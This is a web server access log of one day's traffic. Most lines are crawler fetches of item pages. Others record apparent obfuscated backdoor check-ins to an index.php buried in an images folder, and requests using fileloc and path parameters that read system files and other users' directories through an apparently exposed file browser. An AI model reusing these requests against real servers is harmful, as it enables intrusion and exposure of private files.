51.79.186.0 - - [19/May/2026:15:36:17 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230343937372p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313337372q3062366161356136653231616636326566343761363066313930336333323435222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
199.47.82.19 - - [19/May/2026:15:38:21 +0100] "GET /view/item/0643956508 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
199.47.82.19 - - [19/May/2026:15:38:24 +0100] "GET /view/item/0643974860 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
66.249.71.160 - - [19/May/2026:15:38:25 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/033144732206 HTTP/1.1" 200 27379 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.47.82.19 - - [19/May/2026:15:38:27 +0100] "GET /view/item/0643999645 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:38:28 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc%2FMisc.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc HTTP/2" 200 17436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:38:30 +0100] "GET /view/item/0644051731 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:38:31 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fcontact-form-7%2Fmodules HTTP/2" 200 3924 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:38:33 +0100] "GET /view/item/0644076050 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:38:34 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads%2Fsinatra HTTP/2" 200 2948 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:38:36 +0100] "GET /view/item/0644085437 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:38:37 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc%2FRegistry.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc HTTP/2" 200 5424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:38:39 +0100] "GET /view/item/0644085843 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:38:40 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc%2FEnclosure.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc HTTP/2" 200 9837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:36:39 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230343939392p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313339392q6231303137303466326638356230363537616638616666616534333632353061222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
199.47.82.19 - - [19/May/2026:15:38:42 +0100] "GET /view/item/0644095246 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
199.47.82.19 - - [19/May/2026:15:38:45 +0100] "GET /view/item/0644102085 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:38:46 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc%2FCore.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc HTTP/2" 200 3748 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:38:48 +0100] "GET /view/item/0644112332 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
66.249.71.174 - - [19/May/2026:15:38:47 +0100] "GET /view/item/1783008584 HTTP/1.1" 200 26766 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:38:49 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc%2FCache.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc HTTP/2" 200 4659 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:38:51 +0100] "GET /view/item/0644119171 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:38:52 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc%2FIRI.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc HTTP/2" 200 10476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:38:54 +0100] "GET /view/item/0644120031 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:38:55 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc%2FRegistryAware.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc HTTP/2" 200 3815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:38:57 +0100] "GET /view/item/0644138383 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
199.47.82.19 - - [19/May/2026:15:39:00 +0100] "GET /view/item/0644163168 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:00 +0100] "GET /?fileloc=%2F%2Fsbin%2Fauditctl&path=%2F%2Fsbin HTTP/2" 200 19028 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:37:01 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353032312p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313432312q3538303334376639653930376632386664623565346364613231383037666335222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
199.47.82.19 - - [19/May/2026:15:39:03 +0100] "GET /view/item/0644180660 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:04 +0100] "GET /?fileloc=%2F%2Fsbin%2Fgrub2-bios-setup&path=%2F%2Fsbin HTTP/2" 200 407774 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:06 +0100] "GET /view/item/0644215254 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:07 +0100] "GET /?fileloc=%2F%2Fsbin%2Fblkzone&path=%2F%2Fsbin HTTP/2" 200 14193 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:09 +0100] "GET /view/item/0644248582 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:10 +0100] "GET /?path=%2F%2Fhome%2Fheland HTTP/2" 200 2627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.97 - - [19/May/2026:15:39:09 +0100] "GET /view/item/173232185202 HTTP/1.1" 200 25853 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.47.82.19 - - [19/May/2026:15:39:12 +0100] "GET /view/item/0644258829 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:13 +0100] "GET /?path=%2F%2Fhome%2Fpureictl HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:15 +0100] "GET /view/item/06442824 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:15 +0100] "GET /?path=%2F%2Fhome2%2Fsocialservicedep HTTP/2" 200 2636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:18 +0100] "GET /view/item/0644318208 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:18 +0100] "GET /?fileloc=%2F%2Fetc%2Fuserips&path=%2F%2Fetc HTTP/2" 200 2565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:21 +0100] "GET /view/item/0644327595 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:21 +0100] "GET /?fileloc=%2F%2Fsbin%2Fgetenforce&path=%2F%2Fsbin HTTP/2" 200 5605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:37:23 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353034332p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313434332q3365336335343531356364303739633439663763663362666666343663323737222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
199.47.82.19 - - [19/May/2026:15:39:24 +0100] "GET /view/item/0644334450 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:24 +0100] "GET /?path=%2F%2Fhome%2Flimaxmed HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:27 +0100] "GET /view/item/0644343399 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:27 +0100] "GET /?path=%2F%2Fhome%2Fnasifict5 HTTP/2" 200 2630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:30 +0100] "GET /view/item/0644352380 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:30 +0100] "GET /?path=%2F%2Fetc%2Facpi%2Factions HTTP/2" 200 2915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:15:39:31 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/034208060484 HTTP/1.1" 200 27088 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.47.82.19 - - [19/May/2026:15:39:33 +0100] "GET /view/item/064439191 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:33 +0100] "GET /?fileloc=%2F%2Fsbin%2Fhwclock&path=%2F%2Fsbin HTTP/2" 200 24449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:36 +0100] "GET /view/item/0644395079 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:36 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2F.cpanel%2Fnvdata HTTP/2" 200 3251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:39 +0100] "GET /view/item/0644413431 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:39 +0100] "GET /?fileloc=%2F%2Fsbin%2Fexim_dbmbuild&path=%2F%2Fsbin HTTP/2" 200 8289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:42 +0100] "GET /view/item/0644455302 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:42 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc%2FLocator.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc HTTP/2" 200 6229 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:45 +0100] "GET /view/item/0644464705 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:45 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fupdraftplus%2Frestorer.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fupdraftplus HTTP/2" 200 62279 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:37:45 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353036352p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313436352q6665323131353034393635396264663961653932343632613435656136656431222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
199.47.82.19 - - [19/May/2026:15:39:48 +0100] "GET /view/item/064457543 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:49 +0100] "GET /?fileloc=%2F%2Fsbin%2Fmodsec-sdbm-util&path=%2F%2Fsbin HTTP/2" 200 2574 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:51 +0100] "GET /view/item/0644627428 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:52 +0100] "GET /?fileloc=%2F%2Fsbin%2Ffsck.msdos&path=%2F%2Fsbin HTTP/2" 200 35246 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:39:54 +0100] "GET /view/item/0644635971 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:55 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdovecot&path=%2F%2Fsbin HTTP/2" 200 49832 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:15:39:55 +0100] "GET /view/item/173950741600 HTTP/1.1" 200 26863 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.47.82.19 - - [19/May/2026:15:39:57 +0100] "GET /view/item/0644636393 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:39:58 +0100] "GET /?fileloc=%2F%2Fsbin%2Ffsck.ext4&path=%2F%2Fsbin HTTP/2" 200 142781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:00 +0100] "GET /view/item/0644662882 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:01 +0100] "GET /?fileloc=%2F%2Fsbin%2Fpartprobe&path=%2F%2Fsbin HTTP/2" 200 7257 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:03 +0100] "GET /view/item/0644704753 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:04 +0100] "GET /?fileloc=%2F%2Fetc%2Fips&path=%2F%2Fetc HTTP/2" 200 2583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:06 +0100] "GET /view/item/064473363 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:07 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fmail HTTP/2" 200 3547 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:09 +0100] "GET /view/item/0644764116 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
51.79.186.0 - - [19/May/2026:15:38:08 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353038382p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313438382q6565623261623530323439626232383231393965666233326632336366313437222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:40:10 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fetc HTTP/2" 200 2891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:12 +0100] "GET /view/item/0644782468 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:13 +0100] "GET /?path=%2F%2Fhome%2Fvrgmvedu HTTP/2" 200 2630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:15 +0100] "GET /view/item/0644800414 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:16 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-theme-json-data.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 3264 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:18 +0100] "GET /view/item/0644816218 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
66.249.71.161 - - [19/May/2026:15:40:18 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-block-styles-registry.php?view/item/172195431813 HTTP/1.1" 200 28142 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:40:19 +0100] "GET /?fileloc=%2F%2Fsbin%2Ffaillock&path=%2F%2Fsbin HTTP/2" 200 8825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:21 +0100] "GET /view/item/0644876879 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:22 +0100] "GET /?fileloc=%2F%2Fsbin%2Ffsck.ext3&path=%2F%2Fsbin HTTP/2" 200 142781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:24 +0100] "GET /view/item/0644961449 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:25 +0100] "GET /?path=%2Fhome%2Favasrilanka HTTP/2" 200 2631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:27 +0100] "GET /view/item/0644996481 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:28 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fsodium_compat HTTP/2" 200 3290 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:30 +0100] "GET /view/item/0644997731 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
51.79.186.0 - - [19/May/2026:15:38:30 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353131302p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313531302q6362613230613233656337623465623530356238636461313861326635326136222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
199.47.82.19 - - [19/May/2026:15:40:33 +0100] "GET /view/item/0645056704 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:33 +0100] "GET /?fileloc=%2F%2Fetc%2Fsubuid&path=%2F%2Fetc HTTP/2" 200 2590 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:40:35 +0100] "GET /?path=%2F%2Fhome%2Fdreambri HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:36 +0100] "GET /view/item/0645057548 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:38 +0100] "GET /?path=%2F%2Fhome%2Fzalih HTTP/2" 200 2627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:39 +0100] "GET /view/item/064508395 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
66.249.71.174 - - [19/May/2026:15:40:40 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/03785104643 HTTP/1.1" 200 27588 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:40:41 +0100] "GET /?fileloc=%2F%2Fsbin%2Fexim_dumpdb&path=%2F%2Fsbin HTTP/2" 200 10455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:42 +0100] "GET /view/item/0645090438 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
